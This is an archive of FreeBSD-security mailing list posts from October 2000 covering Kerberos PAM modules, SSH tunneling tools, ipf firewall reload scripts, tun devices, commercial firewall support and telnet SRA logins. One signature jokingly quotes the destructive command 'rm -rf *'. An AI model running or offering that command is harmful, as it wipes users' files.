earth.rila.bg (earth.rila.bg [212.39.75.31]) by hub.freebsd.org (Postfix) with ESMTP id 2EFFD37B502 for ; Mon, 9 Oct 2000 02:10:40 -0700 (PDT) Received: from earth.rila.bg (localhost.rila.bg [127.0.0.1]) by earth.rila.bg (8.9.3/8.9.3) with SMTP id MAA01883 for ; Mon, 9 Oct 2000 12:10:26 +0300 (EEST) (envelope-from mitko@rila.bg) From: Dimitar Peikov Organization: Rila Solutions To: Freebsd-security@FreeBSD.ORG Subject: Kerberos and pam_xxx.so Date: Mon, 9 Oct 2000 12:02:54 +0300 X-Mailer: KMail [version 1.0.28] Content-Type: text/plain MIME-Version: 1.0 Message-Id: <00100912102600.01367@earth.rila.bg> Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've just installed 4.1-RELEASE and try to configure Kerberos5 (Heimdal).= All went ok, but PAM library that must allow=20 kerberos authetification was not available or I can't find them. I try to= compile it from the crypto sources but some errors=20 when generating Makefiles. I could compile and install kerberos5 from the= MIT.EDU sources, but find this unreasonable.=20 Any comments on this would be helpfull! --=20 Dimitar Peikov Programmer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 7:48:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from drawbridge.ctc.com (drawbridge.ctc.com [147.160.99.35]) by hub.freebsd.org (Postfix) with ESMTP id DA18C37B502 for ; Mon, 9 Oct 2000 07:48:35 -0700 (PDT) Received: from server2.ctc.com (server2.ctc.com [147.160.1.4]) by drawbridge.ctc.com (8.10.1/8.10.1) with ESMTP id e99ElEh25624; Mon, 9 Oct 2000 10:47:14 -0400 (EDT) Received: from ctcjst-mail1.ctc.com (ctcjst-mail1.ctc.com [147.160.34.14]) by server2.ctc.com (8.9.3/8.9.3) with ESMTP id KAA12510; Mon, 9 Oct 2000 10:47:08 -0400 (EDT) Received: by CTCJST-MAIL1 with Internet Mail Service (5.5.2650.21) id ; Mon, 9 Oct 2000 10:49:51 -0400 Message-ID: From: "Cameron, Frank" To: freebsd-security@FreeBSD.ORG Cc: "'Mike Thompson'" Subject: RE: Encrypted IP tunneling solution Date: Mon, 9 Oct 2000 10:49:48 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >From: Mike Thompson [mailto:mpthompson@home.net] >Subject: Encrypted IP tunneling solution > >I've created a fairly simple little application called stun that >essentially combines the functionality of nos-tun with SSH. > >Also, if you know of a similar application already in existence, >please let me know so I don't waste my time. This sounds somewhat similar to VTun; vtun.sourceforge.net. -frank To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 7:54:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from lunatic.oneinsane.net (lunatic.oneinsane.net [207.113.133.231]) by hub.freebsd.org (Postfix) with ESMTP id A47BA37B66E for ; Mon, 9 Oct 2000 07:54:15 -0700 (PDT) Received: by lunatic.oneinsane.net (Postfix, from userid 1000) id F25FA15551; Mon, 9 Oct 2000 07:54:14 -0700 (PDT) Date: Mon, 9 Oct 2000 07:54:14 -0700 From: Ron 'The InSaNe One' Rosson To: freebsd-security@freebsd.org Subject: Re: Encrypted IP tunneling solution Message-ID: <20001009075414.B18982@lunatic.oneinsane.net> Reply-To: Ron Rosson Mail-Followup-To: freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from cameron@ctc.com on Mon, Oct 09, 2000 at 10:49:48AM -0400 X-Operating-System: FreeBSD lunatic.oneinsane.net 4.1.1-STABLE X-Moon: The Moon is Waxing Gibbous (86% of Full) X-Opinion: What you read here is my IMHO X-WWW: http://www.oneinsane.net X-GPG-FINGERPRINT: 3F11 DB43 F080 C037 96F0 F8D3 5BD2 652B 171C 86DB X-Uptime: 7:53AM up 21 hrs, 2 users, load averages: 0.05, 0.05, 0.00 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cameron, Frank (cameron@ctc.com) wrote: > >From: Mike Thompson [mailto:mpthompson@home.net] > >Subject: Encrypted IP tunneling solution > > > >I've created a fairly simple little application called stun that > >essentially combines the functionality of nos-tun with SSH. > > > >Also, if you know of a similar application already in existence, > >please let me know so I don't waste my time. > > This sounds somewhat similar to VTun; vtun.sourceforge.net. > Either way I wouldn't mind seeing either one in the ports tree ;-) -- ------------------------------------------------------------------------------ Ron Rosson ... and a UNIX user said ... The InSaNe One rm -rf * insane@oneinsane.net and all was /dev/null and *void() ------------------------------------------------------------------------------ All things considered, insanity may be the only reasonable alternative. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 8: 2: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentinel.office1.bg (sentinel.office1.bg [195.24.48.182]) by hub.freebsd.org (Postfix) with SMTP id 50B0337B503 for ; Mon, 9 Oct 2000 08:01:57 -0700 (PDT) Received: (qmail 5548 invoked by uid 1001); 9 Oct 2000 15:01:51 -0000 Date: Mon, 9 Oct 2000 18:01:51 +0300 From: Peter Pentchev To: Ron 'The InSaNe One' Rosson Cc: freebsd-security@freebsd.org Subject: Re: Encrypted IP tunneling solution Message-ID: <20001009180151.A3049@ringwraith.office1.bg> References: <20001009075414.B18982@lunatic.oneinsane.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001009075414.B18982@lunatic.oneinsane.net>; from insane@lunatic.oneinsane.net on Mon, Oct 09, 2000 at 07:54:14AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 09, 2000 at 07:54:14AM -0700, Ron 'The InSaNe One' Rosson wrote: > Cameron, Frank (cameron@ctc.com) wrote: > > >From: Mike Thompson [mailto:mpthompson@home.net] > > >Subject: Encrypted IP tunneling solution > > > > > >I've created a fairly simple little application called stun that > > >essentially combines the functionality of nos-tun with SSH. > > > > > >Also, if you know of a similar application already in existence, > > >please let me know so I don't waste my time. > > > > This sounds somewhat similar to VTun; vtun.sourceforge.net. > > > > Either way I wouldn't mind seeing either one in the ports tree ;-) There already is a net/vtun port :) G'luck, Peter -- Do you think anybody has ever had *precisely this thought* before? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 9:23:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 6367937B502 for ; Mon, 9 Oct 2000 09:23:19 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id KAA22558; Mon, 9 Oct 2000 10:23:06 -0600 (MDT) Message-Id: <4.3.2.7.2.20001009101945.04999df0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 09 Oct 2000 10:22:59 -0600 To: Mike Thompson , freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Re: Encrypted IP tunneling solution In-Reply-To: <4.3.2.7.2.20001008220611.085d2f00@mail.atomz.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:56 PM 10/8/2000, Mike Thompson wrote: >BTW, my ultimate goal behind this little application is to get it working >with Windows clients running SSH protocols where it can serve as a very >simple, but secure VPN solution. This would be the real value. It would be VERY useful to tunnel Windows clients with minimal effort. It'd be even nicer if it were stand-alone; that is, if it did not require a separate SSH implementation to be installed on the Windows machine. Many of the users who one wants to tunnel into a LAN remotely do not have shell accounts, and giving them such accounts can compromise security and/or be confusing to them. Using SSH 2 (which doesn't require a shell account for port redirection) would be a good way to do this. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 10:18:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from ogyo.pointer-software.com (ogyo.pointer-software.com [210.164.96.147]) by hub.freebsd.org (Postfix) with ESMTP id 972D037B66C for ; Mon, 9 Oct 2000 10:18:09 -0700 (PDT) Received: from long.near.this (long.near.this [10.0.172.9]) by ogyo.pointer-software.com (8.11.0.Beta3/8.11.0.Beta3) with ESMTP id e99HI2f07206 for ; Tue, 10 Oct 2000 02:18:02 +0900 (JST) Message-Id: <200010091718.e99HI2f07206@ogyo.pointer-software.com> Date: Tue, 10 Oct 2000 02:17:08 +0900 From: horio shoichi Organization: pointer software X-Mailer: Mozilla 4.7 [en] (X11; U; Linux 2.0.34 i686) X-Accept-Language: en, ja MIME-Version: 1.0 To: "freebsd-security@FreeBSD.ORG" Subject: Re: Default Deny References: <200010060056.LAA11152@cairo.anu.edu.au> <39DCC1CB.5FDD7F90@allmaui.com> <20001006204807.M31338@speedy.gsinet> <39DE8D1B.923D86DF@allmaui.com> <20001007171153.P31338@speedy.gsinet> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Received: from acm.org (horio@char.near.this [10.0.172.11]) by long.near.this (8.9.3/8.9.3) with ESMTP id CAA90034 for ; Tue, 10 Oct 2000 02:17:09 +0900 (JST) X-Message-Id: <39E1FD94.83C1C941@acm.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Gerhard Sittig wrote: > > > > I use this to reload my settings after changes > > > > #!/bin/sh > > ipf -D > > ipf -Fa -f /etc/ipf.conf -E > > ipnat -CF -f /etc/ipnat.conf > > I would prefer something like > > ipf -I -Fa -f /etc/ipf.conf -v > ( ipf -s; sleep 60; ipf -s; ) & > # heavy testing until the prompt returns > ipf -s # only when you're happy with what the test showed > Here is my preference. ipf -IFa -If ./ipf.rules >errors 2>&1 cat errors test ! -s errors && { rm errors ; ipf -s ; } horio shoichi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 11: 0:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from ocis.ocis.net (ocis.ocis.net [209.52.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 32CF337B66D for ; Mon, 9 Oct 2000 11:00:13 -0700 (PDT) Received: from localhost (vdrifter@localhost) by ocis.ocis.net (8.9.3/8.9.3) with ESMTP id LAA26475 for ; Mon, 9 Oct 2000 11:00:12 -0700 Date: Mon, 9 Oct 2000 11:00:12 -0700 (PDT) From: John F Cuzzola To: freebsd-security@FreeBSD.ORG Subject: FreeBSD tun device Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello everyone, I'm setting up VPN's using the pipsecd port. I know I probably should be using KAME/racoon but pipsecd is easy to set-up and the same software works with Linux boxes- again making things easier. My question is: Since pipsecd requires the tun device is there a limit to the number of tunnel devices FreeBSD will handle? I recall one day someone having a problem with more than 9 tunnel devices and I thought I would ask. Thank-you, John C. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 12: 5:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from alpha.simphost.com (alpha.simphost.com [216.253.163.10]) by hub.freebsd.org (Postfix) with ESMTP id A987737B502 for ; Mon, 9 Oct 2000 12:05:52 -0700 (PDT) Received: by alpha.simphost.com (Postfix, from userid 1016) id 19B4166B03; Mon, 9 Oct 2000 13:01:36 +0000 (GMT) Received: from localhost (localhost [127.0.0.1]) by alpha.simphost.com (Postfix) with ESMTP id 1421262D02; Mon, 9 Oct 2000 13:01:36 +0000 (GMT) Date: Mon, 9 Oct 2000 13:01:36 +0000 (GMT) From: "Jonathan M. Slivko" X-Sender: jslivko@alpha.simphost.com To: Craig Cowen Cc: David Talkington , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-Reply-To: <39E04F14.B3CE226C@allmaui.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org What about LinuxCare and RedHat Support? Isn't that pretty much the same things as what your reffering to when you say: "1-800-helpIseebluescreens". That's esentially the same thing. Isn't it? --------------------------------------------- Jonathan M. Slivko Sys. Admin, Linux Mafia Internet Services Tech. Support, Simple Hosting Solutions "FreeBSD -- The Power To Serve!" --------------------------------------------- On Sun, 8 Oct 2000, Craig Cowen wrote: > Well I sure have stirred up a topic. > Unfortunately, who ever made the point of covering their (The suits) asses > by means of accountability, hit the nail on the head. > That and not being dependant on me. But I argue on that point that there > are many out there who could utilize IPF. > More important, if the person who will be administering FW-1 can't, then > he/she dosen't know enough about the practice. > > Opinions, like assholes (and this list proves what I am about to say), > everybody has one. > Here is mine. > NT has no reason on this planet except for people who want to reboot their > workstation once a week instead of once a day. > As a matter of fact, given the choice between an NT box and a Mac, I would > go back to bussing tables. > Unix is where it is at, Solaris, BSD, Linux, whatever, there is no equal > and there never will be. > > As for 1-800-helpmeIseebluescreens, they are dummer than the poeple who > choose to purchase the product in the first place and have only cheat > sheets created by the engineers who know what will fail because the Suits > above them had to rush their over priced product to market so that they > could go IPO and not under. > > Just my Opinion/Rant/Frustration > > Craig > > David Talkington wrote: > > > -----BEGIN PGP SIGNED MESSAGE----- > > > > >What is really the difference is being able to dial 1-800-FIREWALL and > > >have someone help you out, etc. > > >Darren > > > > Yeah, I wonder if my (item b) instinct was unfair. David Pick > > mentioned herein the possibility that the company might not even WANT > > the expertise to be in-house, and while his scenario was pretty ugly, > > it suggests a more benign one ... if the company goes with an > > open-source solution, and you're the only one on staff who knows how > > to use it, they are then dependent on your talent. Great for you, but > > bad for them, if turnover is high. At least a purchased solution > > ensures some kind of support no matter who leaves the company. > > > > Your thoughts on this? Seems like a valid concern, and not one that I > > had considered. (Perhaps I'm naive ... ) > > > > - -d > > > > - -- > > David Talkington > > Prairienet / Community Networking Initiative > > 217-244-1962 > > dtalk@prairienet.org > > > > PGP Key: http://www.prairienet.org/~dtalk/dt000823.asc > > > > -----BEGIN PGP SIGNATURE----- > > Version: PGP 6.5.8 > > Comment: Made with pgp4pine 1.75-6 > > > > iQEVAwUBOeA/xb1ZYOtSwT+tAQEDVwf+JUhT2WUwbDEJv0shacEfksTScESJb3rI > > Wjv61ZeD/bWrac000SIRakmnUROUecSAq86wIRxX7xj/dcRakBX8TpUUxSwwyrWM > > Pzpy83J4KC81WOvJDS9NUWdJjaagez1edEyyL9PGYGeiBZyglPT4lx/8QsT4GiJl > > ONVOcYmvflAYkmFKRQmE+zBEOsj/qo/g5+64KzmHlEMI00/4yRHvAa2OzETPlLb3 > > sFCtChRgnfQBt20cfGTVerykISFvMcL5jQ4Silp7NzWM+qRC7K2BYI77qaRB8Bds > > tIl3OftUAurg/A23pSWljIybHNFbgV3DPm1bk22oMTfJoTmn4/omVg== > > =Ms+U > > -----END PGP SIGNATURE----- > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 14:48:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id E95BA37B503 for ; Mon, 9 Oct 2000 14:48:40 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id OAA41991; Mon, 9 Oct 2000 14:49:04 -0700 (PDT) Date: Mon, 9 Oct 2000 14:49:04 -0700 From: Kris Kennaway To: Dimitar Peikov Cc: Freebsd-security@FreeBSD.ORG Subject: Re: Kerberos and pam_xxx.so Message-ID: <20001009144904.E41854@citusc17.usc.edu> References: <00100912102600.01367@earth.rila.bg> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00100912102600.01367@earth.rila.bg>; from mitko@rila.bg on Mon, Oct 09, 2000 at 12:02:54PM +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 09, 2000 at 12:02:54PM +0300, Dimitar Peikov wrote: > I've just installed 4.1-RELEASE and try to configure Kerberos5 > (Heimdal). All went ok, but PAM library that must allow kerberos > authetification was not available or I can't find them. I try to > compile it from the crypto sources but some errors when generating > Makefiles. I could compile and install kerberos5 from the MIT.EDU > sources, but find this unreasonable. Heimdal is still considered to be experimental code, and in particular the PAM modules for using it are not yet working. Talk to Mark Murray if you wish to help fix this. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 16:16:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from Awfulhak.org (tun.AwfulHak.org [194.242.139.173]) by hub.freebsd.org (Postfix) with ESMTP id B61C237B66F for ; Mon, 9 Oct 2000 16:16:15 -0700 (PDT) Received: from hak.lan.Awfulhak.org (root@hak.lan.awfulhak.org [172.16.0.12]) by Awfulhak.org (8.11.0/8.11.0) with ESMTP id e99NFKB34879; Tue, 10 Oct 2000 00:15:20 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Received: from hak.lan.Awfulhak.org (brian@localhost [127.0.0.1]) by hak.lan.Awfulhak.org (8.11.1/8.11.0) with ESMTP id e99NFJs13675; Tue, 10 Oct 2000 00:15:19 +0100 (BST) (envelope-from brian@hak.lan.Awfulhak.org) Message-Id: <200010092315.e99NFJs13675@hak.lan.Awfulhak.org> X-Mailer: exmh version 2.1.1 10/15/1999 To: John F Cuzzola Cc: freebsd-security@freebsd.org, brian@Awfulhak.org Subject: Re: FreeBSD tun device In-Reply-To: Message from John F Cuzzola of "Mon, 09 Oct 2000 11:00:12 PDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 10 Oct 2000 00:15:19 +0100 From: Brian Somers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Hello everyone, > I'm setting up VPN's using the pipsecd port. I know I probably should be > using KAME/racoon but pipsecd is easy to set-up and the same software > works with Linux boxes- again making things easier. My question is: Since > pipsecd requires the tun device is there a limit to the number of tunnel > devices FreeBSD will handle? I recall one day someone having a problem > with more than 9 tunnel devices and I thought I would ask. I've had ppp running in multilink mode with 200 links being established simultaneously (creating 200 server processes, each with their own tun device 'till they figure out what's going on). Hopefully, that number can now be increased to virtually any number (since tonights fd_set fix). So in short, no. > Thank-you, > > John C. -- Brian Don't _EVER_ lose your sense of humour ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 18:19:51 2000 Delivered-To: freebsd-security@freebsd.org Received: from femail4.sdc1.sfba.home.com (femail4.sdc1.sfba.home.com [24.0.95.84]) by hub.freebsd.org (Postfix) with ESMTP id 82CAE37B502 for ; Mon, 9 Oct 2000 18:19:48 -0700 (PDT) Received: from mthompson.home.net ([24.7.95.143]) by femail4.sdc1.sfba.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id <20001010011837.KSSK4031.femail4.sdc1.sfba.home.com@mthompson.home.net> for ; Mon, 9 Oct 2000 18:18:37 -0700 Message-Id: <4.3.2.7.2.20001009180629.00cda790@mail.smateo1.sfba.home.com> X-Sender: mpthompson@mail.smateo1.sfba.home.com X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 09 Oct 2000 18:16:10 -0700 To: freebsd-security@freebsd.org From: Mike Thompson Subject: Re: Encrypted IP tunneling solution In-Reply-To: <4.3.2.7.2.20001009101945.04999df0@localhost> References: <4.3.2.7.2.20001008220611.085d2f00@mail.atomz.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Unfortunately, the work involved on the Windows side is not nearly as easy as on the FreeBSD side. It would most likely mean creating a virtual NDIS MAC-layer VxD that essentially serves the same function that /dev/tunXX does on FreeBSD and then writing a Windows userland application would tie the virtual NDIS driver to an encrypted SSH connection. Not impossible, not trivial either. I have come across a Windows version of BPF work-alike driver (it is even under a Berkeley style license) that would help in implementing such a solution. Mike At 10:22 AM 10/9/00 -0600, you wrote: >At 11:56 PM 10/8/2000, Mike Thompson wrote: > >>BTW, my ultimate goal behind this little application is to get it working >>with Windows clients running SSH protocols where it can serve as a very >>simple, but secure VPN solution. > >This would be the real value. It would be VERY useful to tunnel Windows >clients with minimal effort. It'd be even nicer if it were stand-alone; >that is, if it did not require a separate SSH implementation to be >installed on the Windows machine. Many of the users who one wants to >tunnel into a LAN remotely do not have shell accounts, and giving them >such accounts can compromise security and/or be confusing to them. Using >SSH 2 (which doesn't require a shell account for port redirection) would >be a good way to do this. > >--Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 19:16: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 14E8737B503 for ; Mon, 9 Oct 2000 19:15:52 -0700 (PDT) Received: (qmail 13656 invoked by uid 0); 10 Oct 2000 02:15:50 -0000 Received: from p3ee21607.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.7) by mail.gmx.net with SMTP; 10 Oct 2000 02:15:50 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id VAA18292 for freebsd-security@FreeBSD.ORG; Mon, 9 Oct 2000 21:42:25 +0200 Date: Mon, 9 Oct 2000 21:42:25 +0200 From: Gerhard Sittig To: "freebsd-security@FreeBSD.ORG" Subject: Re: Default Deny Message-ID: <20001009214225.W31338@speedy.gsinet> Mail-Followup-To: "freebsd-security@FreeBSD.ORG" References: <200010060056.LAA11152@cairo.anu.edu.au> <39DCC1CB.5FDD7F90@allmaui.com> <20001006204807.M31338@speedy.gsinet> <39DE8D1B.923D86DF@allmaui.com> <20001007171153.P31338@speedy.gsinet> <200010091718.e99HI2f07206@ogyo.pointer-software.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200010091718.e99HI2f07206@ogyo.pointer-software.com>; from horio@acm.org on Tue, Oct 10, 2000 at 02:17:08AM +0900 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 10, 2000 at 02:17 +0900, horio shoichi wrote: > Gerhard Sittig wrote: > > > > > I use this to reload my settings after changes > > > > > > #!/bin/sh > > > ipf -D > > > ipf -Fa -f /etc/ipf.conf -E > > > ipnat -CF -f /etc/ipnat.conf > > > > I would prefer something like > > > > ipf -I -Fa -f /etc/ipf.conf -v > > ( ipf -s; sleep 60; ipf -s; ) & > > # heavy testing until the prompt returns > > ipf -s # only when you're happy with what the test showed > > > > Here is my preference. > > ipf -IFa -If ./ipf.rules >errors 2>&1 > cat errors > test ! -s errors && { rm errors ; ipf -s ; } This will only catch syntax errors and doesn't save you from wrongly implemented rules or faults in your mind due to lack of coffee or sleep. That's why I implement a testing window with the above sequence and an automatic fallback to a known to work state, from where you can decide to activate the previously tested set or to keep on editing it. And it wasn't my own idea to do it that way but I learned it from some ipf doc. But once you created a rule set to lock yourself out, you're very glad the situation will cure itself within a few seconds! Especially when you're not sitting in front of the machine. virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 19:55:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from pericles.IPAustralia.gov.au (pericles.IPAustralia.gov.au [202.14.186.30]) by hub.freebsd.org (Postfix) with ESMTP id D04DC37B66C for ; Mon, 9 Oct 2000 19:55:38 -0700 (PDT) Received: (from smap@localhost) by pericles.IPAustralia.gov.au (8.9.3/8.9.3) id NAA78045; Tue, 10 Oct 2000 13:55:36 +1100 (EST) (envelope-from anwsmh@IPAustralia.Gov.AU) Received: from disc-4-161.aipo.gov.au(10.0.4.161) by pericles.IPAustralia.gov.au via smap (V2.0) id xma078029; Tue, 10 Oct 00 13:55:08 +1100 Received: from localhost (anwsmh@localhost) by stan.aipo.gov.au (8.9.3/8.9.3) with ESMTP id NAA12538; Tue, 10 Oct 2000 13:55:04 +1100 (EST) (envelope-from anwsmh@IPAustralia.Gov.AU) X-Authentication-Warning: stan.aipo.gov.au: anwsmh owned process doing -bs Date: Tue, 10 Oct 2000 13:55:03 +1100 (EST) From: Stanley Hopcroft X-Sender: anwsmh@stan.aipo.gov.au To: Security@FreeBSD.ORG Cc: Carl Makin , shaddon@IPAustralia.Gov.AU Subject: What is this and how do I control it ? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear Ladies and Gentlemen, I am writing to say that when I telnet to a 4.1-RELEASE machine (with librsaINTL and the base crypto distribution installed) from a similar client I see, Trying 10.0.100.252... Connected to tsitc.aipo.gov.au. Escape character is '^]'. Trying SRA secure login: User (anwsmh): What does this mean and how do I manage it ? This telnet client, ktelnet 0.61 seems to negotiate the telnet authentication and encryption options by itself (!) but the FreeBSD telnet, invoked from an rxvt does not get this distinctive SRA secure login prompt. ( Telnet to the same server from an rxvt on the same client :- > telnet tsitc Trying 10.0.100.252... Connected to tsitc.aipo.gov.au. Escape character is '^]'. FreeBSD/i386 (tsitc.aipo.gov.au) (ttyp5) login: ) A trace shows the client asking for Authentication and Encryption telnet options, the server agreeing, and an exchange of Auth strings. The password is not sent in clear text but the subsequent session data is. What means of authentication do they use ? This is great, but I would like to know what is happening and how to reliably reproduce it eg from rxvts on the same client host, from ktelnet 0.61 on another machine. Thank you. Yours sincerely, S Hopcroft Network Specialist IP Australia +61 2 6283 3189 +61 2 6281 1353 FAX To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 20:59:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id EABBD37B66D for ; Mon, 9 Oct 2000 20:59:22 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id OAA22396; Tue, 10 Oct 2000 14:58:54 +1100 (EST) From: Darren Reed Message-Id: <200010100358.OAA22396@cairo.anu.edu.au> Subject: Re: Check Point FW-1 To: jslivko@linux-mafia.net (Jonathan M. Slivko) Date: Tue, 10 Oct 2000 14:58:54 +1100 (Australia/NSW) Cc: craig@allmaui.com (Craig Cowen), dtalk@prairienet.org (David Talkington), freebsd-security@FreeBSD.ORG (freebsd-security@FreeBSD.ORG) In-Reply-To: from "Jonathan M. Slivko" at Oct 09, 2000 01:01:36 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Jonathan M. Slivko, sie said: > > What about LinuxCare and RedHat Support? Isn't that pretty much the same > things as what your reffering to when you say: "1-800-helpIseebluescreens". > That's esentially the same thing. Isn't it? I find it strange that Linux companies are peddling support for BSD systems. Before you know it they'll be offering support contracts for Solaris/Windows too... Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 9 21:53:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 0654C37B66C for ; Mon, 9 Oct 2000 21:53:10 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id AAA27058; Tue, 10 Oct 2000 00:52:28 -0400 Message-ID: <39E2A17E.45615E50@allmaui.com> Date: Mon, 09 Oct 2000 21:56:31 -0700 From: Craig Cowen X-Mailer: Mozilla 4.75 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Darren Reed Cc: "Jonathan M. Slivko" , David Talkington , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: <200010100358.OAA22396@cairo.anu.edu.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Everybody wants in on the game! Darren Reed wrote: > In some mail from Jonathan M. Slivko, sie said: > > > > What about LinuxCare and RedHat Support? Isn't that pretty much the same > > things as what your reffering to when you say: 